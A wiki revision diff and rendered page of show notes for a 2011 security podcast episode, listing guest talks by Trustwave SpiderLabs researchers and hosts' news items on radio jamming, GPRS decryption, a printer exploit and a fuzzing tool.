Difference between revisions of "Episode254"

From Paul's Security Weekly
Jump to: navigation, search
(Speaking with Cryptographic Oracles by Dan Crowley)
(34 intermediate revisions by 4 users not shown)
Line 2: Line 2:
  
  
= Announcements =
+
= Announcements& Shameless Plugs =
  
 
PaulDotCom Security Weekly - Episode 254 for Thursday August 11th, 2011.
 
PaulDotCom Security Weekly - Episode 254 for Thursday August 11th, 2011.
  
 
* Los episodios de PaulDotCom Espanol con Julio Canto, Lorenzo Martinez,  Chema Alonso, Ruben Santamarta y Raul Siles [http://pauldotcom.com/wiki/index.php/PaulDotCom_Espanol esta disponible aqui].   
 
* Los episodios de PaulDotCom Espanol con Julio Canto, Lorenzo Martinez,  Chema Alonso, Ruben Santamarta y Raul Siles [http://pauldotcom.com/wiki/index.php/PaulDotCom_Espanol esta disponible aqui].   
 
+
* Don't miss the August 31st [https://cybersecurityworldevents.webex.com/cybersecurityworldevents/onstage/g.php?t=a&d=664509513  Late Breaking Computer Attack Vectors Webcast Sponsored by Core Security Technologies] with Larry "Mo' Hawk" Pesce.
 
* If you couldn't make it to BlackHat, then consider instead [http://www.sans.org/network-security-2011/description.php?d=4921 the always fabulous SANS Las Vegas] for "Advanced Vulnerability Scanning Techniques Using. Nessus" Saturday, September 17 - Sunday, September 18.
 
* If you couldn't make it to BlackHat, then consider instead [http://www.sans.org/network-security-2011/description.php?d=4921 the always fabulous SANS Las Vegas] for "Advanced Vulnerability Scanning Techniques Using. Nessus" Saturday, September 17 - Sunday, September 18.
 
* DerbyCon : Louisville, Kentucky – September 30th to October 2nd. Catch Carlos Perez's training session - [http://www.derbycon.com/automating-post-exploitation-with-metasploit "Automating Post Exploitation with Metasploit"] Friday and Saturday of the Con from 4:00PM to 9:00PM.
 
* DerbyCon : Louisville, Kentucky – September 30th to October 2nd. Catch Carlos Perez's training session - [http://www.derbycon.com/automating-post-exploitation-with-metasploit "Automating Post Exploitation with Metasploit"] Friday and Saturday of the Con from 4:00PM to 9:00PM.
 
* [http://www.sans.org/new-york-2011-cs-2/description.php?tid=4467 SANS 617 - Wireless Ethical Hacking, Penetration Testing, and Defenses ] with Larry in the salsa capital of the world: NYC on August 22nd - 27th.  
 
* [http://www.sans.org/new-york-2011-cs-2/description.php?tid=4467 SANS 617 - Wireless Ethical Hacking, Penetration Testing, and Defenses ] with Larry in the salsa capital of the world: NYC on August 22nd - 27th.  
 
* Jack wants us to pimp [http://www.secburnout.org Sec Burn Out]
 
* Jack wants us to pimp [http://www.secburnout.org Sec Burn Out]
* Don't forget to [http://pauldotcom.com/ Read our blog], [http://mail.pauldotcom.com/listinfo Participate on our mailing list], [http://pauldotcom.com/insider/ Visit PaulDotCom Insider], [http://twitter.com/pauldotcom Follow us on Twitter], [irc://irc.freenode.net/pauldotcom Join the IRC channel at irc.freenode.net #pauldotcom], and [http://pauldotcom.blip.tv Watch our Videos]!
+
* Don't forget to [http://pauldotcom.com/ Read our blog], [http://mail.pauldotcom.com/listinfo Participate on our mailing list], [http://pauldotcom.com/insider/ Visit PaulDotCom Insider], [http://twitter.com/pauldotcom Follow us on Twitter], [irc://irc.freenode.net/pauldotcom Join the IRC channel at irc.freenode.net #pauldotcom], [http://pauldotcom.blip.tv Watch our Videos] and [http://www.facebook.com/therealpauldotcom Add us on Facebook] where we can be "friends"
** You can [http://www.facebook.com/therealpauldotcom Add us on Facebook] where we can be "friends"
+
* We're spinning up a new mini-podcast/videocast and we and we're looking for topics from our listeners.
 +
 
 +
=Episode Media=
  
= Guest Tech SegmentCon: A Special Night with Trustwave's SpiderLabs!=
+
[http://traffic.libsyn.com/pauldotcom/PaulDotCom-254-Part1.mp3 MP3 pt 1]
 +
 
 +
[http://traffic.libsyn.com/pauldotcom/PaulDotCom-254-Part2.mp3 MP3 pt 2]
 +
 
 +
= Guest Tech Segment Mini-Marathon: A Special Night with Trustwave's SpiderLabs!=
  
 
==Amazingly True Stories of Real Penetration Tests with Rob Havelt & Wendel Henrique==
 
==Amazingly True Stories of Real Penetration Tests with Rob Havelt & Wendel Henrique==
  
7:30 PM EDT / 6:30 p.m. CST
+
7:30 PM EDT / 6:30 PM CST
 +
<center>{{#ev:bliptv|5462811}}</center>
  
 
Rob Havelt, director of penetration testing, and Wendel Henrique, security consultant, will present Earth vs. The Giant Spider: Amazingly True Stories of Real Penetration Tests.
 
Rob Havelt, director of penetration testing, and Wendel Henrique, security consultant, will present Earth vs. The Giant Spider: Amazingly True Stories of Real Penetration Tests.
 
  
 
Rob is Director of SpiderLabs' Penetration Testing Practice, where he oversees all aspects of network and infrastructure security testing and wireless network testing. Formerly a bourbon-fueled absurdist, raconteur, and man about town, Rob is currently a sardonic workaholic occasionally seeking meaning in the finer things in life — Rob is, and will always be, a career hacker.
 
Rob is Director of SpiderLabs' Penetration Testing Practice, where he oversees all aspects of network and infrastructure security testing and wireless network testing. Formerly a bourbon-fueled absurdist, raconteur, and man about town, Rob is currently a sardonic workaholic occasionally seeking meaning in the finer things in life — Rob is, and will always be, a career hacker.
  
 
Wendel is a consultant for pen testing at Trustwave, where he has discovered vulnerabilities across a diverse set of technologies including webmail systems, wireless access points, remote access systems, web application firewalls, IP cameras, and IP telephony applications.  
 
Wendel is a consultant for pen testing at Trustwave, where he has discovered vulnerabilities across a diverse set of technologies including webmail systems, wireless access points, remote access systems, web application firewalls, IP cameras, and IP telephony applications.  
 
Presentation is:
 
  
 
# The unique opportunity to see real, interesting, uncommon and some non- trivial attacks that can't be found by automated tools.
 
# The unique opportunity to see real, interesting, uncommon and some non- trivial attacks that can't be found by automated tools.
 
# Culled from the more than 2300 penetration tests delivered last year by SpiderLabs - only the coolest and freakiest were selected to present at DEFCON 19.
 
# Culled from the more than 2300 penetration tests delivered last year by SpiderLabs - only the coolest and freakiest were selected to present at DEFCON 19.
 
# By the end of this presentation, they hope to have the you thinking about systems and applications that organizations use every day, and how they may be used against them.
 
# By the end of this presentation, they hope to have the you thinking about systems and applications that organizations use every day, and how they may be used against them.
 +
 +
The attacks are:
  
 
* Do you want Fries with that Hack?
 
* Do you want Fries with that Hack?
Line 42: Line 48:
 
* Oracle and The New Tool Hack
 
* Oracle and The New Tool Hack
  
 +
==Traps of Gold by Andrew Wilson & Michael Brooks ==
  
===Proper Bios===
+
8:00 PM EDT / 7:00 PM CST
  
Rob Havelt:
+
<center>{{#ev:bliptv|5462820}}</center>
 
+
Rob has conceived and led original research for Microsoft Encrypted Filesystem (EFS) cracking and file recovery, producing a whitepaper based on this research that lead to clarification in the PCI DSS. He also conducted original research into Frequency Hopping Spread Spectrum (FHSS) wireless networks, publishing a whitepaper to help Trustwave and their clients determine compliance needs for these networks. Havelt has written for the Linux journal and served as a technical editor for Cisco press and other leading scientific publishers. A sought-after speaker on the conference circuit, Havelt has addressed major industry gatherings such as Black Hat, TOORCON and THOTCON.
+
 
+
 
+
Wendel Bio:
+
 
+
Wendel Guglielmetti Henrique is a consultant for penetration testing at Trustwave's SpiderLabs, the advanced security team within Trustwave focused on forensics, ethical hacking, and application security testing for premier clients. He has worked with IT since 1997, during the last 8 years he has worked in the computer security field. During his career, he has discovered vulnerabilities across a diverse set of technologies including webmail systems, wireless access points, remote access systems, web application firewalls, IP cameras, and IP telephony applications. Some tools he wrote already were used as examples in national magazines like PCWorld Brazil and international ones like Hakin9 Magazine.  Recent presentations include Black Hat Arsenal 2010 (USA), OWASP AppSec Research 2010 (Sweden) and Black Hat Europe 2010 (Spain). Last year, Wendel spoke in Troopers 09 (Germany), OWASP AppSecEU09 (Poland), YSTS 3.0 (Brazil), and has previously spoken in well known security conferences such as Defcon 16 (USA) and H2HC (Brazil). During the past 4 years he has been working as a penetration tester, where he has performed countless network, application and web application penetration tests for various organizations across government, banking, and commercial sectors, as well as the payment card industry.
+
 
+
+
 
+
A number of tools authored by Wendel have been featured in national magazines such as PCWorld Brazil and international publications like Hakin9 Magazine. In particular, Wendel developed the first tool to detect the infamous BugBear virus in 2002, before it was detected by popular anti-virus solutions. He is constantly providing content and development help to famous publications like Hakin9 magazine, tools like N-Stalker - Web Application Security Scanner, Acunetix Web Security Scanner and NetSparker - False Positive Free Web Application Security Scanner.
+
 
+
==Traps of Gold by Andrew Wilson & Michael Brooks ==
+
  
 
Traps of Gold is a study which examines the offenses and defenses of web application security and introduces "maneuverability" - a new strategy for fighting back.
 
Traps of Gold is a study which examines the offenses and defenses of web application security and introduces "maneuverability" - a new strategy for fighting back.
  
 +
Andrew specializes in application security assessment, penetration testing, threat modeling and secure development life cycle. Andrew is active as a leader of the Phoenix OWASP  and is a Microsoft MVP in Windows Azure.  He is not a Cabal member.
  
8PM EDT / 7:00 p.m. CST
+
Michael works for SiteWatch, where he composes exploit code, which he considers a challenging and  privileged art form. Michael is on PaulDotCom because he believes secure software is a luxury that should be shared. He's also in the April - June 2011 edition of the [http://www.google.com/about/corporate/company/halloffame.html Google Security Hall of Fame].  
  
Andrew specializes in application security assessment, penetration testing, threat modeling and secure development life cycle. Andrew is active as a leader of the Phoenix OWASP  and is a Microsoft MVP in Windows Azure.
+
<center>[[File:TrapsofGold.jpg]]</center>
  
Michael works for SiteWatch, where he composes exploit code, which he considers a challenging and  privileged art form. Michael is on PaulDotCom because he believes secure software is a luxury that should be shared.
+
==Speaking with Cryptographic Oracles by Dan Crowley==
  
 +
8:30 PM EDT / 7:30 PM CST
  
===Proper Bios===
+
<center>{{#ev:bliptv|5462802}}</center>
  
Wilson Bio:
+
Speaking with Cryptographic Oracles is a discussion of methods for finding and exploiting encryption, decryption, and padding oracles from a black box perspective.
  
Andrew Wilson is a Security Consultant at Trustwave. He is a member of Trustwave's SpiderLabs - the advanced security team focused on penetration testing, incident response, and application security. He has over 9 years experience building and securing software for a variety of companies. Andrew specializes in application security assessment, penetration testing, threat modeling and secure development life cycle. Andrew is active in the developer and security community as a speaker, a trainer, and as a leader of the Phoenix OWASP & Azure user groups. Andrew is recognized as a Microsoft MVP in Windows Azure.  
+
Dan is an Application Security Consultant for Trustwave's SpiderLabs and is particularly focused on vulnerabilities caused by a failure to account for little known or even undocumented properties of the platforms on which applications run. He especially enjoys playing around with Web based technologies and rock climbing, has been known to be a unicorn Furnace, and makes a mean chili quite worthy of a PaulDotCom post-exploitation towel.
  
Brooks Bio:
+
# What is an Oracle?
 +
# How can people really bad at math translate cihpertext into plaintext?
 +
# How can this help us evade detection and prevention of web app attacks?
  
Michael Brooks writes exploit code because it is challenging and a privileged art form. He writes secure software and helps others do the same because secure software is a luxury that should be shared. He is the top answerer of security and cryptography questions on StackOverflow.com (Rook).
+
= Stories For Discussion =
Exploit Code: http://www.exploit-db.com/author/?a=628
+
He works for [https://sitewat.ch Sitewatch]
+
  
 +
== Steve Holden, DefCon Talks Summary ==
  
 +
Steve is a senior systems engineer for a U.S. Navy R&D organization in San Diego.  His key research focus areas include: information technology systems, enterprise computing, computer network security, and project management.  Steve is on to give us an overview of the talks he attended at DefCon 19.
  
8:30 PM EDT / 7:30 p.m.
+
== Larry's Stories ==
  
==Speaking with Cryptographic Oracles by Dan Crowley==
+
#[http://www.cqdx.ru/ham/misc/p-25-radios-killed-by-30-toy/ Government disruptors carry pink pagers] - [Larry] - Thanks to Travis Goodspeed (and others) how have hacked the GRRLtech IM-ME pink pager to do all sorts of things, now can use it to DoS government/federal law enforcement communications. First off, the communications is secured with a protocol known as Project 25 (P25), which they were able to monitor using parts from radio shack.  What they were able to determine is that P25 does not use spread spectrum (and I'm guessing frequency hopping), but instead relies on metadata encoded in the transmission in order to decipher the encoded transmission.  So, what happens if that metadata is interrupted?  the communications cannot be decoded.  In fact, it only takes a "jamming" pulse  of 1/100th of a second during portions of the metadata transmission to DoS the transmission.  This might be a nice thing to deploy at your home during a SHTF situation, as P25 radios are allegedly in use by every major law enforcement agency. After just reading the [http://www.usenix.org/events/sec11/tech/full_papers/Clark.pdf whitepaper], Travis was involved, as was Sandy Clark (sending hugs your way) who's talk I missed at DEFCON.
 +
#[http://seclists.org/fulldisclosure/2011/Aug/76 CDMA and 4G MitM'ed at DEFCON?] - [Larry] - Who knows.  This post claims yes, and that attacks were launched against PCs and Android devices. no mention of iPhone attacks.  Honestly it makes sense, as all the moving parts exist.  I did notice my phone getting dumbed down to GPRS, clicks on my calls, and some seriously delayed SMS messages.  Sure it is possible, but I won;t believe it until I see proof…
 +
#[http://www.h-online.com/security/news/item/GPRS-connections-easily-tapped-1321018.html …and GPRS cracked] - [Larry] - Karsten Nohl will be releasing some tools (but not the keys) in order to decrypt GPRS data communications.  During his research, he was able to determine that various carriers us different varieties of the A5 algorithm used with GSM networks, and some had no encryption at all.  The hardware needed?  Just some older, cheap, readily available phones.
  
Speaking with Cryptographic Oracles is a discussion of methods for finding and exploiting encryption, decryption, and padding oracles.
+
== Paul's Stories ==
  
Dan is an Application Security Consultant for Trustwave's SpiderLabs and is particularly focused on vulnerabilities caused by a failure to account for little known or even undocumented properties of the platforms on which applications run. He especially enjoys playing around with Web based technologies and rock climbing, is NOT a Cabal member and makes a mean chili quite worthy of a PaulDotCom post-exploitation towel.
+
#[http://pauldotcom.com/2011/08/top-10-things-i-learned-at-bla.html Top 10 Things I Learned at Blackhat 2011, Defcon 19 and Vegas] - Tip #1, bring extra socks.
 
+
#[http://edge-security.blogspot.com/2011/08/wfuzz-20-released.html Wfuzz 2.0 released!] - Love this tool, we did a tech segment on it. Works great for sheer brute force fuzzing of web applications. More payloads, encoders, and flexibility!
[[File:TrapsofGold.jpg]]
+
#[http://xkcd.com/936/ Xkcd On Password Strength] - And still, people had words with me on Twitter. Do the MATH! Also, you have to factor in how easu it is to remember.
 
+
#[http://www.exploit-db.com/exploits/17635/ HP JetDirect PJL Interface Universal Path Traversal] - Really cool exploit for PJL printers, in the Metasploit framework, this and one other module let you list files and read them. Works on PXXX series printers according to the exploit.
===Proper Bio===
+
#[http://newswire.xbiz.com/view.php?id=137331 Leaving Wi-Fi Connections 'Open' Can Be Costly] - Open Wifi, still! Its an easy thing to do, set a password on your router. Now, does this mean you should lock your doors and Windows too otherwise its just like inviting someone to come in and steal your TV? Leaving a loaded gun around just invites people to pick it up and start shooting? Do you have to show that you tried to secure it? Or you will end up like this guy: "defendant named in a recent BitTorrent suit recently was ordered to pay $10,401 despite statements that he never downloaded or uploaded any of the porn studio's content. In the judgment, he acknowledged his negligence for not securing his connection." Damn, $10k worth of porn, wish he was my neighbor :)
 
+
#[http://gizmodo.com/5829999/why-does-this-guy-have-an-assault-rifle-at-the-apple-store Why Does This Guy Have an Assault Rifle at the Apple Store?] - One word answer: Photoshop. Don't believe everything you see on the web (its a damn cool SIG SG 550 too, so hot).
Crowley Bio:
+
#[http://blog.tenablesecurity.com/2011/08/blackhat-2011-the-rise-of-the-machines.html Black Hat 2011: The Rise Of The Machines] - My adventures at Blackhat.
 
+
Daniel Crowley is an Application Security Consultant for Trustwave's SpiderLabs team. He has been working in the information security industry for over 6 years and has been focused on penetration testing, specifically on Web applications. Daniel is particularly interested in vulnerabilities caused by a failure to account for little known or even undocumented properties of the platforms on which applications run. He especially enjoys playing around with Web based technologies and physical security technologies and techniques. Dan also rock climbs and makes a mean chili.
+
 
+
= Stories For Discussion =
+
 
+
== Larry's Stories ==
+
 
+
== Paul's Stories ==
+

Revision as of 19:23, 11 July 2013

Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security
BlackSquirrel
Onapsis


Announcements& Shameless Plugs

PaulDotCom Security Weekly - Episode 254 for Thursday August 11th, 2011.

Episode Media

MP3 pt 1

MP3 pt 2

Guest Tech Segment Mini-Marathon: A Special Night with Trustwave's SpiderLabs!

Amazingly True Stories of Real Penetration Tests with Rob Havelt & Wendel Henrique

7:30 PM EDT / 6:30 PM CST

Rob Havelt, director of penetration testing, and Wendel Henrique, security consultant, will present Earth vs. The Giant Spider: Amazingly True Stories of Real Penetration Tests.

Rob is Director of SpiderLabs' Penetration Testing Practice, where he oversees all aspects of network and infrastructure security testing and wireless network testing. Formerly a bourbon-fueled absurdist, raconteur, and man about town, Rob is currently a sardonic workaholic occasionally seeking meaning in the finer things in life — Rob is, and will always be, a career hacker.

Wendel is a consultant for pen testing at Trustwave, where he has discovered vulnerabilities across a diverse set of technologies including webmail systems, wireless access points, remote access systems, web application firewalls, IP cameras, and IP telephony applications.

  1. The unique opportunity to see real, interesting, uncommon and some non- trivial attacks that can't be found by automated tools.
  2. Culled from the more than 2300 penetration tests delivered last year by SpiderLabs - only the coolest and freakiest were selected to present at DEFCON 19.
  3. By the end of this presentation, they hope to have the you thinking about systems and applications that organizations use every day, and how they may be used against them.

The attacks are:

  • Do you want Fries with that Hack?
  • One PBX Will Rule Them All Hack.
  • The Inside-Out VPN Hack.
  • The Island Nation and Port 0 Hack.
  • The Caucasian-Asian Love Hack.
  • In Soviet Russia Hackers Monitor You Hack.
  • Oracle and The New Tool Hack

Traps of Gold by Andrew Wilson & Michael Brooks

8:00 PM EDT / 7:00 PM CST

Traps of Gold is a study which examines the offenses and defenses of web application security and introduces "maneuverability" - a new strategy for fighting back.

Andrew specializes in application security assessment, penetration testing, threat modeling and secure development life cycle. Andrew is active as a leader of the Phoenix OWASP and is a Microsoft MVP in Windows Azure. He is not a Cabal member.

Michael works for SiteWatch, where he composes exploit code, which he considers a challenging and privileged art form. Michael is on PaulDotCom because he believes secure software is a luxury that should be shared. He's also in the April - June 2011 edition of the Google Security Hall of Fame.

TrapsofGold.jpg

Speaking with Cryptographic Oracles by Dan Crowley

8:30 PM EDT / 7:30 PM CST

Speaking with Cryptographic Oracles is a discussion of methods for finding and exploiting encryption, decryption, and padding oracles from a black box perspective.

Dan is an Application Security Consultant for Trustwave's SpiderLabs and is particularly focused on vulnerabilities caused by a failure to account for little known or even undocumented properties of the platforms on which applications run. He especially enjoys playing around with Web based technologies and rock climbing, has been known to be a unicorn Furnace, and makes a mean chili quite worthy of a PaulDotCom post-exploitation towel.

  1. What is an Oracle?
  2. How can people really bad at math translate cihpertext into plaintext?
  3. How can this help us evade detection and prevention of web app attacks?

Stories For Discussion

Steve Holden, DefCon Talks Summary

Steve is a senior systems engineer for a U.S. Navy R&D organization in San Diego. His key research focus areas include: information technology systems, enterprise computing, computer network security, and project management. Steve is on to give us an overview of the talks he attended at DefCon 19.

Larry's Stories

  1. Government disruptors carry pink pagers - [Larry] - Thanks to Travis Goodspeed (and others) how have hacked the GRRLtech IM-ME pink pager to do all sorts of things, now can use it to DoS government/federal law enforcement communications. First off, the communications is secured with a protocol known as Project 25 (P25), which they were able to monitor using parts from radio shack. What they were able to determine is that P25 does not use spread spectrum (and I'm guessing frequency hopping), but instead relies on metadata encoded in the transmission in order to decipher the encoded transmission. So, what happens if that metadata is interrupted? the communications cannot be decoded. In fact, it only takes a "jamming" pulse of 1/100th of a second during portions of the metadata transmission to DoS the transmission. This might be a nice thing to deploy at your home during a SHTF situation, as P25 radios are allegedly in use by every major law enforcement agency. After just reading the whitepaper, Travis was involved, as was Sandy Clark (sending hugs your way) who's talk I missed at DEFCON.
  2. CDMA and 4G MitM'ed at DEFCON? - [Larry] - Who knows. This post claims yes, and that attacks were launched against PCs and Android devices. no mention of iPhone attacks. Honestly it makes sense, as all the moving parts exist. I did notice my phone getting dumbed down to GPRS, clicks on my calls, and some seriously delayed SMS messages. Sure it is possible, but I won;t believe it until I see proof…
  3. …and GPRS cracked - [Larry] - Karsten Nohl will be releasing some tools (but not the keys) in order to decrypt GPRS data communications. During his research, he was able to determine that various carriers us different varieties of the A5 algorithm used with GSM networks, and some had no encryption at all. The hardware needed? Just some older, cheap, readily available phones.

Paul's Stories

  1. Top 10 Things I Learned at Blackhat 2011, Defcon 19 and Vegas - Tip #1, bring extra socks.
  2. Wfuzz 2.0 released! - Love this tool, we did a tech segment on it. Works great for sheer brute force fuzzing of web applications. More payloads, encoders, and flexibility!
  3. Xkcd On Password Strength - And still, people had words with me on Twitter. Do the MATH! Also, you have to factor in how easu it is to remember.
  4. HP JetDirect PJL Interface Universal Path Traversal - Really cool exploit for PJL printers, in the Metasploit framework, this and one other module let you list files and read them. Works on PXXX series printers according to the exploit.
  5. Leaving Wi-Fi Connections 'Open' Can Be Costly - Open Wifi, still! Its an easy thing to do, set a password on your router. Now, does this mean you should lock your doors and Windows too otherwise its just like inviting someone to come in and steal your TV? Leaving a loaded gun around just invites people to pick it up and start shooting? Do you have to show that you tried to secure it? Or you will end up like this guy: "defendant named in a recent BitTorrent suit recently was ordered to pay $10,401 despite statements that he never downloaded or uploaded any of the porn studio's content. In the judgment, he acknowledged his negligence for not securing his connection." Damn, $10k worth of porn, wish he was my neighbor :)
  6. Why Does This Guy Have an Assault Rifle at the Apple Store? - One word answer: Photoshop. Don't believe everything you see on the web (its a damn cool SIG SG 550 too, so hot).
  7. Black Hat 2011: The Rise Of The Machines - My adventures at Blackhat.